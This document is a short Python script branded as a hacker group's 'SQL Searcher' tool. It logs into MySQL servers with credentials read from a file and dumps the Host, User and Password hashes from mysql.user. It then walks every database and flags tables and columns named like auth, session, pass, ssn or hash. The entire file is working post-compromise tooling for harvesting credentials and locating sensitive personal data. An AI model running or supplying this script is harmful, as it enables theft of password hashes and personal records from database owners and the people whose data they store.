SRBTOOL | SQL Searcher

1. #SRBAHCKERS
2.  
3. #!/usr/bin/env python3
4.  
5. # On Kali Linux get the pymysql library by installing python3-pymysql
6. import pymysql
7.  
8. # User editable variables. Define the tables of interest (toi), the columns of
9. # interest (coi), the database connection time out, and the filename holding
10. # the mysql credentials in the format of host|user|pass|port.
11. #
12. # When editing the toi and coi tables keep in mind that auth will match all
13. # of the following:
14. # auth, authentication, authorization, user_auth, user_authentication
15. toi = ['auth', 'user', 'session']
16. coi = ['pass', 'ssn', 'usr', 'session', 'hash']
17. connect_timeout = 10
18. cred_file = 'mysql_creds.txt'
19.  
20.  
21. # Should not need to edit anything below this line.
22. def query(conn, sql):
23.     try:
24.         with conn.cursor() as cursor:
25.             cursor.execute(sql)
26.             result = cursor.fetchall()
27.             return result
28.  
29.     except pymysql.err.OperationalError as e:
30.         print('[-] {0}'.format(e))
31.         return None
32.  
33.     except Exception as e:
34.         print('[-] {0}'.format(e))
35.         return None
36.  
37.  
38. def connect(host, user, pwd, db=None, port=3306):
39.     try:
40.         return pymysql.connect(host=host, user=user, password=pwd,
41.                                database=db, port=port,
42.                                connect_timeout=connect_timeout)
43.  
44.     except pymysql.err.OperationalError as e:
45.         print('[-] {0}'.format(e))
46.         return None
47.  
48.     except Exception as e:
49.         print('[-] {0}'.format(str(e)))
50.         return None
51.  
52.  
53. def get_dbs(conn):
54.     if conn is not None:
55.         results = query(conn, 'show databases')
56.  
57.         if results is None:
58.             return []
59.         else:
60.             return [r[0] for r in results]
61.  
62.         conn.close()
63.  
64.     else:
65.         return []
66.  
67.  
68. def get_tables(conn):
69.     if conn is not None:
70.         results = query(conn, 'show tables')
71.  
72.         if results is None:
73.            return []
74.         else:
75.             return [r[0] for r in results]
76.  
77.     else:
78.         return []
79.  
80.  
81. def get_columns(conn, db, table):
82.     if conn is not None:
83.         sql = 'show columns from {0}.{1}'.format(db, table)
84.         results = query(conn, sql)
85.  
86.         if results is None:
87.             return []
88.         else:
89.             return [r[0] for r in results]
90.  
91.     else:
92.         return []
93.  
94.  
95. def get_db_creds(host, conn):
96.     if conn is not None:
97.         sql = 'select Host, User, Password from mysql.user'
98.         results = query(conn, sql)
99.  
100.         if results is not None:
101.             return['{0}-{1}-{2}:{3}'.format(host, r[0], r[1],
102.                                             r[2].strip('*')) for r in results]
103.         else:
104.             return []
105.  
106.     else:
107.         return []
108.  
109.  
110. def get_creds(filename):
111.     for line in open(filename):
112.         line = line.strip('\r\n')
113.         host, user, pwd, port = line.split('|')
114.         yield host, user, pwd, int(port)
115.  
116.  
117. def interesting_table(host, db, table):
118.     for t in toi:
119.         if t in table:
120.             of_interest.append((host, db, table))
121.  
122.  
123. def interesting_col(host, db, table, col):
124.     for c in coi:
125.         if c in col:
126.             of_interest.append((host, db, table, col))
127.  
128.  
129. def search_db(host, user, pwd, port):
130.     conn = connect(host, user, pwd, port=port)
131.  
132.     print('[*] Getting MySQL credentials.')
133.     db_creds.extend(get_db_creds(host, conn))
134.  
135.     dbs = get_dbs(conn)
136.     for db in dbs:
137.         print('[*] Searching database {0}'.format(db))
138.         conn = connect(host, user, pwd, port=port, db=db)
139.         tables = get_tables(conn)
140.  
141.         for table in tables:
142.             interesting_table(host, db, table)
143.  
144.             cols = get_columns(conn, db, table)
145.             for col in cols:
146.                 interesting_col(host, db, table, col)
147.  
148.         conn.close()
149.  
150.  
151. #-----------------------------------------------------------------------------
152. # Begin Main Program
153. #-----------------------------------------------------------------------------
154. db_creds = []
155. of_interest = []
156.  
157. for creds in get_creds(cred_file):
158.     host, user, pwd, port = creds
159.     print('[*] Searching {0} on port {1}'.format(host, port))
160.     search_db(host, user, pwd, port)
161.  
162. print()
163. print('Interesting Tables and Columns')
164. print('==============================')
165. print('Server:Database->Table->Column')
166. print('------------------------------')
167. print('\n'.join(['{0}:{1}'.format(i[0], '->'.join(i[1:])) for i in of_interest]))
168. print()
169. print('MySQL Hashes')
170. print('============')
171. print('Server-Host-Username:Password')
172. print('-----------------------------')
173. print('\n'.join(db_creds))